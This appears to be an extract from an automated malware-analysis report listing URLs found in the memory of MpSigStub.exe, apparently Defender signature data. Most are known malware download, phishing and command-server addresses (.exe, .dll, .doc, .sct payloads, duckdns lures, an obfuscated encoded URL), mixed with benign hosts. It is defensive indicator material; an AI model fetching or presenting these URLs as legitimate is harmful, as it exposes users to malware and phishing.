Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://ncb.com.pe/media-views/pool=67/frenchclicks/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://ncccnnnc.cn/img/index.php
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/e.js
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/f2/f.js
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/s.js
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://nfe-fazenda.tk/mml/filenet.jpg
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://nh4esf33e.from-ia.com/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/download.php?filename=%s&key=%s
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/post.php
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://nigera21.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://nmextensions.com/preconfirm.php?sid=0&aid=0&said=0
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/com6i3re47t.de/earth
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://nownowsales.com/wp-admin/ulpbz/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://nq4k.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://ntlligent.info/tds/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://o%66%66%49%63e%2e%46%41q%53%65%72v.%43%6f%4d/%46%41%51%2e%6a%73
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://obscurewax.ru/joystick.js
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://ocean-v.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://oddbods.co.uk/D6yd9x/
Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp	String found in binary or memory: http://offensiveware.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://office-service-secs.com/blm.task
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://office.otzo.com/office.sct
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://ogrc.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://old.forwart.ru/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://online-game-group.ru/download.php
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://online-security-center.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://online-stats201.info/ur.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesecuritynet.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://padgettconsultants.ca/tau.gif
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://pantscow.ru:8080/vector_graphic.js
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://paparra.net/invoice/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000023.00000003.6272731314.0000028BD7935000.00000004.00000001.sdmp	String found in binary or memory: http://pcmaticplus.com/success.html
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://pic-pic.pw
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://picosoftnepal.net/ach-form/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://pilinno.info/cpi/promo.exe
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp	String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://pirsl.com.au/signatures/new.jpg
Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://pl2.txt.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://planilha.webcindario.com/planilha
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://plugin.videosraros.info/chrome.xml
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://pluginprovider.com/?rap
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://pmxmrnull.dynu.net:
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://pomphrett.co.uk/c7fb/install/language/verouiller.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://poppy97.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://portalconnectme.com/56778786598.doc
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://premiumclass.bar/0pzional1a.dll
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://premiumclass.cyou/0pzional1a.dll
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://privateinvestigatorkendall.com/fo9cwuvlqwua
Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp	String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp	String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://psget.net/GetPsGet.ps1x
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://pulp99.com/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://pulp99.com/1.rtf
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://q-i-e-n.com/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://qiiqur.com/frix.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://qudaih.com/pzlnkda/nbsa
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://queendrinks.com.ar/open-past-due-orders/
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://quince78.cyan.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://qwst1t.3322.org:8087
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
